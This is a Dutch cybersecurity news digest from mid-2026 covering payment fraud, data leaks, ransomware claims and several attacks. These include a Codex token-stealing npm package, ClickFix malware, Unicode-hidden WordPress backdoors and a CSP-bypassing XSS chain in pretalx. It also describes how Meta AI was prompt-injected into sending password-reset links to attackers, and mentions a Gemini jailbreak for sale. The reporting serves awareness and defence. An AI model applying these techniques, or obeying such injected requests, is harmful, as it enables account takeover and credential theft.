De Nederlandsche Bank (DNB) meldt een significante toename van frauduleuze transacties in het Nederlandse betalingsverkeer in het afgelopen jaar. Het aantal incidenten steeg met 30 procent tot 658.000, terwijl het totale fraudebedrag met 22 procent toenam tot 198 miljoen euro. Deze stijging is te wijten aan diverse factoren, die per betaalmethode verschillen.

Bij overschrijvingen maken fraudeurs steeds vaker gebruik van misleiding, vooral bij snelle betaaltransacties die moeilijk terug te draaien zijn. Het grootste schadebedrag, ongeveer 148 miljoen euro, werd geregistreerd bij deze vorm van fraude. Hierbij worden particulieren en bedrijven vaak misleid om zelf geld over te maken via methoden zoals bankhelpdeskfraude, beleggingsfraude en WhatsAppfraude. DNB wijst erop dat de stijging vooral te zien is bij zogeheten instant betalingen, waarbij het geld binnen tien seconden op de rekening van de ontvanger staat, en bij betalingen naar het buitenland. Fraudeurs kiezen mogelijk vaker voor deze methoden omdat het terugdraaien van dergelijke transacties aanzienlijk lastiger is.

Ook bij kaartbetalingen, zowel fysiek als online, was er een forse stijging. Vorig jaar werden 514.000 frauduleuze transacties met kaartbetalingen geregistreerd, een toename van ruim een kwart ten opzichte van 2024. Het totale fraudebedrag met kaartbetalingen steeg van 36 miljoen euro naar ongeveer 41 miljoen euro. Deze groei vond voornamelijk plaats bij online betalingen, waarbij criminelen veelal via phishing gestolen kaartgegevens gebruiken, met name voor transacties naar het buitenland. Ook worden particulieren en bedrijven soms misleid om zelf een online betaling goed te keuren. Bij betalingen aan de fysieke kassa gaat het vaker om misbruik van verloren of gestolen betaalpassen of creditcards.

Tot slot is er een recente toename in de fraude bij contante opnames door verloren of gestolen betaalpassen. De Nederlandsche Bank benadrukt het belang van voorzichtigheid en alertheid bij alle vormen van betalingsverkeer om de impact van deze groeiende fraude te beperken.

 

Bron: De Nederlandsche Bank | Bron 2: dnb.nl | Bron 3: autoriteitpersoonsgegevens.nl

02 juli 2026 | Avans Hogeschool getroffen door datalek van gevoelige persoonsgegevens

De Nederlandse hogeschool Avans heeft te maken gekregen met een datalek waarbij gevoelige persoonsgegevens gedurende bijna een jaar toegankelijk waren binnen een specifieke applicatie. De onderwijsinstelling heeft dit zelf gemeld, maar weigert concrete details te geven over de aard van de gevoelige persoonsgegevens. Volgens de melding op de website van Avans konden gegevens worden benaderd die als gevoelig worden beschouwd, maar om de privacy van betrokkenen te waarborgen, wordt deze informatie niet publiekelijk gedeeld.

Het datalek deed zich voor in AMIGO, een intern systeem van de hogeschool dat managementinformatie weergeeft, waaronder gegevens over aanmeldingen en uitval van studenten. Dit systeem is gebouwd op het Power BI-platform van Microsoft. Op 30 juni van het voorgaande jaar werd een wijziging doorgevoerd in de omgeving van Microsoft, wat onbedoeld leidde tot de mogelijkheid om gegevens te verkrijgen die herleidbaar waren tot individuele personen.

Begin deze maand werd de kwetsbare situatie ontdekt door een medewerker van Avans. De hogeschool heeft onmiddellijk maatregelen genomen om het datalek op te lossen en heeft tevens melding gedaan bij de Autoriteit Persoonsgegevens. Een onderzoek naar de precieze oorzaak is gestart. Avans heeft reeds vastgesteld dat de gehanteerde processen in dit specifieke geval onvoldoende waren om de betreffende gegevens adequaat te beschermen. Als gevolg hiervan zijn de genomen en nog te nemen maatregelen voornamelijk gericht op het aanvullen en verbeteren van deze processen, controles en monitoring.

Uit latere berichtgeving in de media blijkt dat het datalek groter is dan aanvankelijk bekend werd. Behalve gegevens van studenten waren ook persoonsgegevens van medewerkers toegankelijk, tot en met hun salarisgegevens aan toe. Volgens die berichtgeving ging het in totaal om de gegevens van bijna twintigduizend betrokkenen.

Hoewel Avans Hogeschool geen aanwijzingen heeft dat de toegankelijke gegevens daadwerkelijk zijn misbruikt, kan dit ook niet volledig worden uitgesloten. De onderwijsinstelling benadrukt dat Microsoft weliswaar de eigenaar is van Power BI, maar dat Avans zelf verantwoordelijk is voor het beheer en de beveiliging van de opgeslagen gegevens. Deze verantwoordelijkheid wordt door de hogeschool erkend. Gedupeerden van het datalek zijn gisteren persoonlijk op de hoogte gebracht, waarbij ook is uitgelegd welke specifieke soorten persoonsgegevens toegankelijk waren.

 

Bron: Avans Hogeschool

02 juli 2026 | Nederlands interieurbedrijf Steegaa Interior geclaimd door The Gentlemen ransomware

De ransomwaregroep The Gentlemen heeft het Nederlandse bedrijf Steegaa Interior op hun afpersingssite geplaatst als een vermeend slachtoffer. Steegaa Interior, gevestigd in Helmond, is een interieurbouwbedrijf dat gespecialiseerd is in het ontwerpen, maken en plaatsen van maatwerk interieurs voor zowel particuliere als zakelijke klanten.

De ransomwaregroep beweert bedrijfsgegevens te hebben buitgemaakt en dreigt deze openbaar te maken indien niet aan hun eisen wordt voldaan. De vermelding op het darkweb werd via darkweb-monitoring waargenomen op 1 juli 2026. De exacte omvang van de geclaimde buit en de juistheid van de beweringen zijn op dit moment niet onafhankelijk bevestigd.

The Gentlemen is een relatief nieuwe maar actieve ransomwaregroep die de afgelopen maanden meerdere bedrijven in West-Europa heeft geclaimd. Eerder waren ook al organisaties in Nederland en België het doelwit van deze groep. Getroffen organisaties wordt algemeen aangeraden om geen losgeld te betalen aan cybercriminelen en altijd aangifte te doen bij de bevoegde autoriteiten.

 

Bron: Cybercrimeinfo

Dreigingen

4.0 Dreigingen:

01 juni 2026 | Populaire ontwikkeltool voor AI steelt OpenAI refresh tokens

Een veelgebruikte softwaretool, die door duizenden mobiele ontwikkelaars is gedownload, is ontdekt terwijl deze heimelijk authenticatietokens steelt. Op 27 mei 2026 publiceerde Aikido Security onderzoek over een kwaadaardig pakket op npm genaamd `codexui-android`. Dit pakket, een populaire webinterface op afstand voor OpenAI Codex (een taalmodel dat code schrijft), wordt wekelijks ongeveer 27.000 keer gedownload.

Charlie Eriksen, onderzoeker bij Aikido Security, ontdekte dat dit pakket vorige maand een supply chain aanval uitvoerde om gebruikersdata te stelen. Opmerkelijk is dat de aanvallers geen standaardmethoden zoals typosquatting of accountkaping gebruikten. In plaats daarvan ontwikkelden ze een daadwerkelijk nuttige tool, vermoedelijk om een legitieme gebruikersbasis op te bouwen voordat deze werd bewapend. Het kwaadaardige code bestaat niet in de publieke repository op GitHub, maar verschijnt alleen in het gepubliceerde pakket op npm, waardoor een standaard audit van de broncode dit zou missen.

De aanval wordt direct geactiveerd bij het laden van de module. De eerste regel van `dist-cli/index.js` importeert een verborgen script genaamd `chunk-PUR7OUAG.js`. Dit script controleert snel op lokale referenties. Indien gevonden, wordt een exfiltratieroutine gestart om `access_token`, `id_token`, `account ID` en de `refresh_token` uit het `auth.json`-bestand te stelen. Een bijzonder problematisch aspect is dat een `refresh_token` niet verloopt, waardoor aanvallers zich voor onbepaalde tijd kunnen voordoen als het slachtoffer.

Om het netwerkverkeer te verbergen, stuurt de code de gestolen gegevens naar een endpoint van de server genaamd `sentry.anyclawstore`. Deze naam werd opzettelijk gekozen om op te gaan in de normale telemetrie voor foutrapportage van Sentry. In de verborgen source map liet de auteur zelfs een duidelijke opmerking achter: "Send tokens to our startlog endpoint (always)".

De onderzoekers merkten in een blogpost op dat deze dreigingsactor ook Android mobiele apparaten target. De auteur publiceerde apps in de Google Play Store onder de ontwikkelaarsidentiteit BrutalStrike, die ook eigenaar is van een legitiem mobiel spel met meer dan 5 miljoen downloads. Twee specifieke apps, een betaalde productiviteitsapp genaamd `codex.app` en een andere genaamd "OpenClaw Codex Claude AI Agent", bevatten dezelfde kwaadaardige infrastructuur.

De apps voor Android doorstaan gemakkelijk de voorpublicatie beveiligingsscans van Google, omdat het initiële APK bestand van 26 MB er volledig schoon uitziet. Eenmaal geïnstalleerd, extraheert de app een Linux userland afgeleid van Termux naar privéopslag en start Node.js met behulp van PRoot. Vervolgens wordt een commando uitgevoerd om de nieuwste versie van het pakket op npm te installeren: `pnpm add codexui-android@latest`. De exfiltratie is actief sinds versie `2.1.0`.

Toen Eriksen de auteur confronteerde, plaatste deze kort een opmerking waarin hij beweerde de toegang tot zijn account op npm te zijn kwijtgeraakt. Dit werd kort daarna verwijderd en vervangen door een bedrijfsverklaring waarin elke diefstal van referenties werd ontkend. Vanaf vandaag zijn de kwaadaardige softwarepakketten en apps nog steeds online beschikbaar. De onderzoekers concludeerden: "ontwikkeltools voor AI worden een doelwit van hoge waarde, juist omdat de tokens krachtig en langdurig zijn... een dreigingsactor heeft veel moeite geïnvesteerd in het bouwen van een geloofwaardig, nuttig project om als dekmantel te gebruiken. De legitimiteit is de aanvalsvector. Naarmate tools voor AI zich verspreiden en ontwikkelaars naar productiviteitssnelkoppelingen grijpen, verwacht dan meer van dit soort aanvallen."

 

Bron: Aikido Security

01 juni 2026 | Crimineel biedt vermeende exploit voor promptinjectie in Gemini 3.1 te koop aan op ondergronds forum

Op een ondergronds forum is een aanbod verschenen voor een exploit die volgens de aanbieder misbruikmaakt van promptinjectie in het taalmodel Gemini 3.1. De crimineel claimt dat deze exploit de ingebouwde beveiligingsregels van het grote taalmodel kan omzeilen. Hoewel de advertentie geen specifieke technische details bevat, wordt er wel gesproken over een 'proof of concept' met bijbehorende screenshots en voorbeelden, die op verzoek beschikbaar zouden zijn voor geïnteresseerde kopers. De prijs voor de exploit wordt via privécontact besproken.

De claims over de functionaliteit van de exploit zijn op dit moment niet onafhankelijk geverifieerd. Er is geen informatie beschikbaar over welke specifieke versies van Gemini 3.1 kwetsbaar zouden zijn, welke vereisten er zijn voor een succesvolle aanval, of hoe betrouwbaar de aangeboden methode daadwerkelijk is. Dit aanbod past in een bredere, zorgwekkende trend waarbij technieken zoals 'jailbreaks' en promptinjectie voor taalmodellen steeds vaker als handelswaar op criminele markten verschijnen.

Organisaties die toepassingen inzetten die gebaseerd zijn op grote taalmodellen, doen er goed aan om proactieve beveiligingsmaatregelen te treffen. Dit omvat het zorgvuldig valideren van alle invoer, het continu monitoren van de uitvoer van de modellen, het strikt scheiden van rechten en het alert zijn op signalen die kunnen duiden op aanvallen via promptinjectie. Door deze stappen te volgen, kunnen potentiële risico's worden beperkt.

 

Bron: Cybercrimeinfo

01 juni 2026 | Lek in Meta AI maakte kaping van Instagramaccounts mogelijk, gearchiveerd account van het Witte Huis bekendste slachtoffer

Een ernstige kwetsbaarheid in de digitale assistent Meta AI van Instagram maakte het mogelijk om accounts over te nemen, zelfs als deze waren beveiligd met tweefactorauthenticatie. Kwaadwillenden konden door middel van promptinjectie, een techniek waarbij misleidende instructies worden gegeven, de assistent zover krijgen dat deze een wachtwoordherstelcode of een herstellink naar het e-mailadres van de aanvaller stuurde. Dit proces omzeilde de gebruikelijke identiteitscontroles van Instagram.

Elke aanvaller die de gebruikersnaam van een doelwit kende, kon dit overnameproces in gang zetten. De methode omvatte het gebruik van een VPN die overeenkwam met de geografische locatie van het doelwit. Vervolgens vroeg de aanvaller via de Meta AI een wachtwoordherstel aan, waarbij een eigen e-mailadres werd opgegeven voor de ontvangst van de herstellink of code.

Een prominent slachtoffer van deze methode was het gearchiveerde Instagramaccount van het Witte Huis uit de regeringsperiode van voormalig president Barack Obama. Dit account, dat sinds januari 2017 niet meer actief werd gebruikt, werd misbruikt om een afbeelding met een politieke boodschap te plaatsen. Meta heeft de hack inmiddels bevestigd, het account veiliggesteld en de ongeautoriseerd geplaatste inhoud verwijderd.

Volgens beveiligingsonderzoekers zijn op deze manier meer hoogwaardige accounts en korte, gewilde gebruikersnamen overgenomen, waarna ze werden doorverkocht via Telegram. Meta heeft verklaard dat de kwetsbaarheid inmiddels is verholpen. Dit incident benadrukt hoe digitale assistenten een nieuw en significant aanvalsoppervlak introduceren zodra zij in staat zijn gevoelige acties zoals wachtwoordherstel uit te voeren.

Bron: Neowin | Bron 2: tmz.com

02 juni 2026 | Chrome koppelt sessiecookies aan hardware ter bescherming tegen accountovernames

Google introduceert een nieuwe beveiligingsfunctie in de Chrome-browser, genaamd Device Bound Session Credentials (DBSC), die ingelogde sessies cryptografisch koppelt aan het specifieke toestel waarop ze zijn aangemaakt. Deze maatregel is ontworpen om het voor cybercriminelen aanzienlijk moeilijker te maken om gestolen sessiecookies te misbruiken voor accountovernames.

Sessiecookies zijn al geruime tijd een geliefd doelwit voor aanvallers. Wanneer een aanvaller een sessiecookie bemachtigt, kan deze zich voordoen als een reeds aangemelde gebruiker, waardoor een nieuw wachtwoord of een multifactorauthenticatieproces niet nodig is. Dit maakt sessiekaping een bijzonder efficiënte methode voor het overnemen van accounts.

DBSC pakt dit probleem aan door sessies te verbinden met de unieke hardware van een apparaat. Op systemen met Windows maakt Chrome hiervoor gebruik van de Trusted Platform Module (TPM), terwijl toestellen met macOS de Secure Enclave inzetten. Bij het inloggen genereert Chrome niet alleen een sessiecookie, maar ook een cryptografisch sleutelpaar. De sessie blijft zodoende onlosmakelijk verbonden met die specifieke hardware. Een aanvaller die enkel de cookie weet te stelen, beschikt daardoor niet over de essentiële sleutels die nodig zijn om de sessie te misbruiken. Google verwacht dat dit de bruikbaarheid van gestolen sessies voor accountovernames aanzienlijk zal verminderen.

Google kondigde DBSC reeds in 2024 aan en is nu gestart met de brede uitrol van de functionaliteit. De functie wordt automatisch geactiveerd en kan niet handmatig worden uitgeschakeld door gebruikers. Voor klanten van Google Workspace zijn er geen administratieve handelingen vereist. Om DBSC te kunnen gebruiken, moeten systemen minimaal Chrome 146 draaien op Windows of Chrome 148 op macOS. Daarnaast is compatibele hardware noodzakelijk, zoals een TPM-chip op Windows systemen en de Secure Enclave op Macs.

Deze beveiligingsmaatregel komt op een moment dat malware die browsergegevens steelt, waaronder sessiecookies, steeds vaker wordt ingezet. Hoewel DBSC deze specifieke aanvalsvector minder aantrekkelijk maakt, benadrukt Google dat gebruikers waakzaam moeten blijven. De nieuwe beveiliging beschermt tegen het misbruik van gestolen cookies, maar voorkomt niet dat malware andere gevoelige gegevens buitmaakt.

 

Bron: itdaily.com

02 juni 2026 | Dashlane gebruikersaccounts vergrendeld na brute force aanvallen

Dashlane, een bekende wachtwoordmanager, heeft een beveiligingsincident openbaar gemaakt waarbij gebruikersaccounts het doelwit waren van een grootschalige brute force aanval. De aanval begon op 31 mei 2026, zo meldt het bedrijf. Een externe dreigingsactor probeerde de twee-factor authenticatie (2FA) beveiligingen te omzeilen door herhaaldelijk authenticatiecodes te raden. Het doel was om ongeautoriseerde apparaten te registreren op de accounts van slachtoffers.

De aanval werd gedetecteerd door de geautomatiseerde beveiligingssystemen van Dashlane. Deze systemen reageerden door de verdachte activiteiten te blokkeren en de getroffen gebruikersaccounts preventief te vergrendelen. Dit leidde tot de vergrendeling van meerdere accounts, waardoor gebruikers tijdelijk geen toegang hadden tot hun wachtwoordmanager.

Een brute force aanval is een methode waarbij aanvallers systematisch combinaties van wachtwoorden of, in dit geval, authenticatiecodes proberen totdat de juiste combinatie wordt gevonden. Door het herhaaldelijk raden van 2FA-codes hoopten de aanvallers een tweede beveiligingslaag te doorbreken die normaal gesproken toegang tot een account beschermt, zelfs als het wachtwoord bekend is. Het succesvol registreren van een ongeautoriseerd apparaat zou de dreigingsactor in staat stellen om toekomstige inlogpogingen uit te voeren zonder de noodzaak van de 2FA-code, wat een aanzienlijk risico vormt voor de privacy en veiligheid van de opgeslagen gegevens.

Dashlane heeft in reactie op het incident stappen ondernomen om de beveiliging verder te versterken en gebruikers te informeren over de situatie. Hoewel de geautomatiseerde verdedigingsmechanismen de aanvallen hebben afgeslagen en ongeautoriseerde toegang tot zover bekend is voorkomen, benadrukt het incident het voortdurende gevaar van gerichte cyberaanvallen op accounts die gevoelige informatie bevatten, zoals wachtwoorden. Gebruikers van Dashlane die getroffen zijn, zullen waarschijnlijk instructies ontvangen om hun account te herstellen en opnieuw te beveiligen.

 

Bron: Dashlane

02 juni 2026 | DriveSurge misbruikt duizenden websites voor ClickFix en FakeUpdates malware

Een dreigingsactor, bekend als DriveSurge, voert grootschalige malware-distributiecampagnes uit door middel van ClickFix- en FakeUpdates-technieken op gecompromitteerde websites. Volgens onderzoekers van cybersecuritybedrijf SilentPush zijn duizenden websites gecompromitteerd in DriveSurge-campagnes om bezoekers om te leiden naar infrastructuur voor malwarelevering.

ClickFix is een social engineering tactiek die slachtoffers verleidt tot het kopiëren en uitvoeren van kwaadaardige commando's op hun systemen, vaak resulterend in malware-infecties onder het mom van het oplossen van een technisch probleem. Bij FakeUpdates-aanvallen lokken dreigingsactoren slachtoffers met frauduleuze software-updateprompts, meestal door browserupdates na te bootsen, om hen te verleiden tot het downloaden en installeren van kwaadaardige payloads.

SilentPush-onderzoekers melden dat de dreigingsactor DriveSurge voornamelijk functioneert als een initial access broker (IAB) die opereert op een pay-per-install (PPI) model, wat verdere aanvallen mogelijk maakt. Bezoekers van gecompromitteerde websites worden omgeleid via een Traffic Distribution System (TDS) genaamd zTDS. Dit systeem profileert hen en bepaalt of een FakeUpdates- of een ClickFix-lokmiddel geschikter is. zTDS is een open-source TDS dat al sinds minstens 2015 bestaat en dat DriveSurge sinds minstens september 2025 gebruikt. SilentPush stelt dat DriveSurge met zTDS duizenden legitieme websites met een hoge reputatie kaapt en bezoekers stilzwijgend omleidt naar malware, zonder medeweten van de eigenaren van de sites of hun bezoekers.

De FakeUpdates-lokmiddelen bevatten valse updateberichten voor browsers zoals Chrome, Firefox, Edge, Safari, Opera, Brave, Yandex, Vivaldi, Samsung Internet en UC Browser. De ClickFix-aanvallen omvatten PowerShell-commando's. Een specifiek geval, belicht in het SilentPush-rapport, betreft een valse update voor Firefox die een ZIP-archief downloadde met meerdere DLL's en een kwaadaardig uitvoerbaar bestand genaamd ‘Browser Update.exe’.

De onderzoekers identificeerden acht technische vingerafdrukken die aan de campagne zijn gekoppeld en die hielpen bij het identificeren van de DriveSurge-infrastructuur en gecompromitteerde websites. Hieronder valt een JavaScript-injectie volgens het patroon ‘t.js?site= ’, waarbij een unieke waarde aan elke gecompromitteerde website wordt toegekend. Door analyse ontdekte SilentPush meer dan 80 kwaadaardige injectiedomeinen en een reeks voorbereide domeinen die nog niet in aanvallen waren gebruikt. Bovendien ontdekten de onderzoekers een geobfusceerde JavaScript-payload die specifiek is ontworpen om macOS-desktopsystemen aan te vallen. Deze payload werd geleverd via verificatie-gerelateerde ClickFix-aanvallen die het klembord kapen, wat aangeeft dat de campagne verder reikt dan Windows. Gebruikers wordt aangeraden browserupdates alleen te downloaden via de instellingen van hun applicatie (Over > Controleren op updates) en geen commando's uit te voeren in de Windows-opdrachtprompt of Terminal die ze niet volledig begrijpen.

 

Bron: SilentPush | Bron 2: hubs.li

02 juni 2026 | WordPress malware verbergt C2-data in Steam-profielen met onzichtbare Unicode

Een recente malwarecampagne heeft bijna 2.000 WordPress websites geïnfecteerd door op ingenieuze wijze command-and-control (C2) data te verbergen in commentaren op Steam Community profielen. De dreigingsactor maakt gebruik van onzichtbare Unicode-tekens om een payload te coderen die een URL naar een kwaadaardig script opbouwt. Door het platform van Valve te misbruiken, vermijdt de aanvaller het onderhouden van een aparte C2-infrastructuur en omzeilt deze traditionele detectiemethoden.

De campagne werd voor het eerst ontdekt in juli 2025. Sindsdien hebben beveiligingsexperts van GoDaddy malware aangetroffen op ongeveer 1.980 WordPress websites. Het is onduidelijk hoe de hackers de websites precies compromitteren, maar onderzoekers vermoeden dat de initiële infectievector varieert van gestolen admin-inloggegevens of gecompromitteerde FTP/SFTP-referenties tot de exploitatie van een kwetsbaar WordPress thema of plugin, of een supply chain compromis.

De eerste stage malware die op een website wordt geplaatst, gebruikt WordPress paginaloads om specifieke Steam-profielen te benaderen en tekst uit onschuldig lijkende commentaren te extraheren. Deze tekst bevat echter verborgen Unicode-tekens die kwaadaardige payloads verhullen, soms vermomd als ASCII-kunst.

GoDaddy onderzoekers beschrijven in een rapport dat de dreigingsactor zes onzichtbare Unicode-tekens gebruikt voor de gecodeerde payload: Zero-width non-joiner (U+200C), Zero-width joiner (U+200D), Function application (U+2061), Invisible times (U+2062), Invisible separator (U+2063) en Invisible plus (U+2064). De decoder negeert alle zichtbare tekens en koppelt de onzichtbare aan een overeenkomstig nummer; vervolgens worden deze omgezet naar een binaire representatie en worden bytes gereconstrueerd uit de binaire stroom. Deze codering stelt binaire data in staat om te worden ingebed in normaal ogende tekst, waarbij de zichtbare tekens dienen als camouflage terwijl de onzichtbare tekens de daadwerkelijke payload dragen.

Volgens de onderzoekers wordt de gedecodeerde payload gebruikt om een `hello-mywordl[.]info` URL op te bouwen. Deze URL dient JavaScript-code die in elke frontend WordPress pagina wordt geïnjecteerd. Op basis van de bestandsnamen, zoals `asahi-jquery-min-bundle` en `lodash.core.min.js`, wordt de opgehaalde malware vermomd als een legitieme JavaScript-bibliotheek. De laatste fase van de aanval is de implementatie van een backdoor die reageert op speciaal geconstrueerde POST-verzoeken die een specifieke authenticatie cookie bevatten. Als de `tEcaKKXEsb` cookie aanwezig is, accepteert de backdoor base64 gecodeerde PHP code via een POST-parameter.

GoDaddy beschrijft verschillende ontwijkingsmechanismen die door de malware worden gebruikt, waaronder geobfusceerde strings met octale en hexadecimale escapes, gerandomiseerde functienamen, nep uitgeschakelde loggingcode en het gebruik van standaard API's van WordPress, waardoor de malware zich vermengt met normale activiteit.

Website-eigenaren kunnen zich verdedigen door te controleren op verwijzingen naar Steam Community URL's, verdachte externe JavaScript-injecties, uitgaande verbindingen van WordPress servers naar Steam, en onverwachte scripts die laden vanaf domeinen zoals `hello-mywordl[.]info`. Andere indicatoren zijn onzichtbare Unicode-tekens, verdachte `_transient_caption_` cache-ingangen, uitgeschakelde SSL-verificatie in cURL-verzoeken en POST-verzoeken die de authenticatie cookies of de `new_code` parameter van de malware bevatten. De onderzoekers adviseren beveiligingsteams om prioriteit te geven aan het herstellen vanaf een bekende goede backup van vóór de infectiedatum. Indien dit niet mogelijk is, moet het handmatige schoonmaakproces grondig zijn, omdat aanvallers de verwijderde code opnieuw kunnen installeren via de backdoor als een component actief blijft.

 

Bron: Australische overheid | Bron 2: godaddy.com | Bron 3: hubs.li

02 juni 2026 | Tientallen Red Hat npm packages besmet met infostealer malware

Aanvallers hebben tientallen npm packages van Red Hat voorzien van infostealer malware, zo is recentelijk bekendgemaakt. Deze kwaadaardige software is specifiek ontworpen om diverse gevoelige gegevens, ook wel "secrets" genoemd, van besmette systemen te stelen.

Volgens StepSecurity zijn er maar liefst 31 gecompromitteerde packages geïdentificeerd, die gezamenlijk meer dan 100.000 wekelijkse downloads genereren. De specifieke packages die het betreft vallen onder de noemer @redhat-cloud-services npm packages. Ontwikkelaars die deze besmette pakketten downloaden en installeren, riskeren directe infectie van hun ontwikkelomgeving.

De malware wordt door StepSecurity omschreven als een uiterst effectieve 'credential harvester'. Deze functionaliteit stelt de malware in staat om een breed scala aan secrets, credentials en tokens te verzamelen. Tot de doelwitten behoren gevoelige toegangsgegevens voor kritieke ontwikkel- en cloudplatformen, waaronder GitHub Actions, AWS (Amazon Web Services), GCP (Google Cloud Platform), Azure (Microsoft Azure), Kubernetes, HashiCorp Vault, npm en CircleCI.

Naast het stelen van deze waardevolle gegevens, richt de malware zich ook op de softwareprojecten waar de getroffen ontwikkelaar aan werkt. Een bijzonder zorgwekkend aspect van de aanval is de methode waarmee de aanvallers hun invloed proberen uit te breiden. Met de gestolen npm tokens tracht de malware besmette versies te publiceren van andere packages waar het slachtoffer beheerderstoegang toe heeft. Dit kan leiden tot een verdere verspreiding van de malware binnen de supply chain.

Cybersecuritybedrijf JFrog Security heeft de aanval toegeschreven aan een specifieke groep aanvallers, bekend onder de naam TeamPCP. Deze groep heeft in het verleden al een spoor van vergelijkbare supply chain aanvallen achtergelaten. Eerdere slachtoffers van TeamPCP omvatten prominente organisaties en projecten zoals SAP, Checkmarx, Lightning, Intercom, Trivy en GitHub zelf. De aanhoudende activiteit van TeamPCP onderstreept de noodzaak voor organisaties en ontwikkelaars om hun software supply chain zorgvuldig te beveiligen en alert te zijn op verdachte activiteiten binnen hun ontwikkelprocessen.

 

Bron: StepSecurity en JFrog Security | Bron 2: github.com

02 juni 2026 | Zero-Click kwetsbaarheid in XSS in pretalx maakt accountovername mogelijk

Cybersecurityonderzoekers van het bedrijf Novee Security hebben een gevaarlijke kwetsbaarheid ontdekt in pretalx, populaire open-source software, die cybercriminelen in staat stelt accounts van organisatoren volledig over te nemen zonder dat zij een enkele link hoeven aan te klikken. Het betreft een stored Cross-Site Scripting (XSS) kwetsbaarheid met een hoge ernst, aangeduid als CVE-2026-41241, en heeft een hoge CVSS-score van 8.7.

Pretalx wordt veel gebruikt voor het beheren van Call for Papers (CFP)-processen en planning voor evenementen variërend van hacker-camps tot academische symposia. De kwetsbaarheid werd geanalyseerd door Elad Meged, een founding engineer en beveiligingsonderzoeker bij Novee. Hij merkte op dat, hoewel verschillende evenementen van buitenaf onafhankelijk lijken, ze op dezelfde onderliggende codebase draaien. Dit betekent dat één enkele kwetsbaarheid een systemische blootstelling creëert binnen de hele sector.

De blogpost van Novee, gedeeld met Hackread.com, onthult dat de aanvalsvector lage privileges en lage complexiteit vereist. Elke geregistreerde gebruiker kan deze misbruiken door eenvoudigweg HTML of JavaScript in de zoekbalk-dropdown aan de organisatorzijde te plaatsen. Hierbij wordt de conferentiewebsite misleid om kwaadaardige code uit te voeren die is verborgen in normale presentatie-inzendingen.

Onderzoekers leggen uit dat pretalx een strikt Content Security Policy (CSP) hanteert met `script-src ‘self’` en HTML5 `innerHTML` scriptonderdrukking om ongeautoriseerde code-uitvoering te voorkomen. Aanvallers kunnen deze verdedigingsmechanismen echter volledig omzeilen via een geketende exploit. Hierbij uploaden ze een `.js` payload-bestand, vermomd als normaal leermateriaal of dia's, naar het CFP-platform. Omdat het bestand direct op het platform wordt opgeslagen, neemt het de domeinoorsprong van de site over. De aanvaller plaatst vervolgens een `iframe`-tag in de titel van de inzending.

Wanneer een organisator zoekt naar veelvoorkomende woorden zoals "intro" of "machine learning", wordt de titel door de "typeahead" zoekfunctie gerenderd. Het `srcdoc`-attribuut creëert een nieuwe documentcontext die het HTML5-scriptblok omzeilt. Omdat pretalx een `frame-src`-richtlijn mist, voert de `iframe` het geüploade script uit, waardoor het CSP-filter wordt gepasseerd. Dit geeft het script volledige toegang tot de sessie van de organisator voor directe overname, gegevensdiefstal en geautomatiseerde acceptatie van sprekers.

De analyse onthulde ook een secundaire techniek die helemaal geen JavaScript vereist. Door een `image`-tag in een inzendingstitel te plaatsen, maakt de browser automatisch een geauthenticeerd GET-verzoek om de afbeeldingsbron te laden. Op het moment dat de zoekresultaten worden gerenderd, activeert dit verzoek een "superuser-demotion"-endpoint, waardoor de admin-privileges van de organisator permanent worden ingetrokken.

Verder bleek uit het onderzoek hoe dreigingsactoren geautomatiseerde AI-softwareagenten kunnen gebruiken om deze kwetsbaarheid op grotere schaal te misbruiken. Ze kunnen een agent inzetten om openbare pretalx-implementaties te scrapen, aangepaste presentatie-samenvattingen te genereren met behulp van grote taalmodellen (LLM's), en tegelijkertijd tientallen conferenties automatisch te overspoelen met de kwaadaardige payload. Ze hoeven alleen de zoektermen te targeten die organisatoren het meest gebruiken om hun eigen inzendingen geaccepteerd te krijgen, waardoor ze theoretisch een acceptatiegraad van 100% kunnen behalen voor 40 of meer conferenties.

Traditionele applicatiebeveiligingstools falen om deze aanvallen te detecteren. Onderzoekers merkten op: “Statische analyse markeert `innerHTML`. DAST-scanners herhalen payloads tegen formulieren.” Ze legden uit dat, hoewel tools individuele bugs als laag risico classificeren, ze niet kunnen modelleren hoe een autonome agent deze onderdelen kan samenvoegen tot een volledige keten.

Novee heeft het pretalx-team en maker Tobias Kunze geprezen voor een snelle en coöperatieve reactie. De kwetsbaarheid is officieel gepatcht op 27 mei 2026, in pretalx versie v2026.1.0.

 

Bron: Novee Security | Bron 2: github.com | Bron 3: nvd.nist.gov

02 juni 2026 | OpenAI Codex authenticatietokens gestolen via malafide npm-pakket en Android-applicaties

Onderzoekers op het gebied van cybersecurity hebben details bekendgemaakt over een nieuwe kwaadaardige aanval op de toeleveringsketen, gericht op ontwikkelaars die OpenAI Codex gebruiken via een legitiem ogende webinterface op afstand. Het betreft het npm-pakket `codexui-android`, dat op GitHub en npm wordt geadverteerd als een webinterface voor OpenAI Codex en meer dan 29.000 wekelijkse downloads aantrekt. Het pakket is nog steeds beschikbaar via de repository.

Deze activiteit is opmerkelijk omdat het geen traditionele aanval betreft die gebruikmaakt van typosquatting of wegwerppakketten om ontwikkelaars te misleiden. In plaats daarvan is de kwaadaardige code ingebed in een functioneel npm-pakket dat actief is ontwikkeld. De bijbehorende GitHub-repository is nog steeds schoon. Volgens Charlie Eriksen, onderzoeker bij Aikido Security, heeft elke aanroep van het pakket in de afgelopen maand stilzwijgend authenticatietokens van Codex geëxfiltreerd naar een server die onder controle staat van de aanvallers.

De schadelijke wijzigingen zouden ongeveer een maand na de publicatie van het pakket in het register zijn geïntroduceerd, waarschijnlijk in een poging om gebruikersvertrouwen op te bouwen en het bereik te vergroten. Het npm-account dat aan het pakket is gekoppeld, is "friuns", ook bekend als Igor Levochkin.

In het pakket bevindt zich code die de inhoud van het `~/.codex/auth.json` bestand van Codex extraheert en deze exfiltreert naar een externe server, `sentry.anyclaw[.]store`, die zich voordoet als Sentry, een legitiem platform voor applicatiemonitoring en foutopsporing. De vastgelegde gegevens omvatten de `access_token`, `refresh_token`, `id_token` en account-ID. Eriksen benadrukt dat de `refresh_token` niet verloopt, waardoor een aanvaller die deze in handen heeft, zich onbeperkt en stilzwijgend kan voordoen als het slachtoffer. Een gestolen Codex `refresh_token` geeft meer dan alleen toegang tot een chatinterface; het biedt persistente, stille toegang tot alles wat dat account kan doen.

OpenAI waarschuwt in zijn ondersteuningsdocumentatie dat gebruikers `~/.codex/auth.json` moeten behandelen als een wachtwoord, omdat het toegangstokens bevat. Het wordt afgeraden om het te committen, in tickets te plakken of in chats te delen.

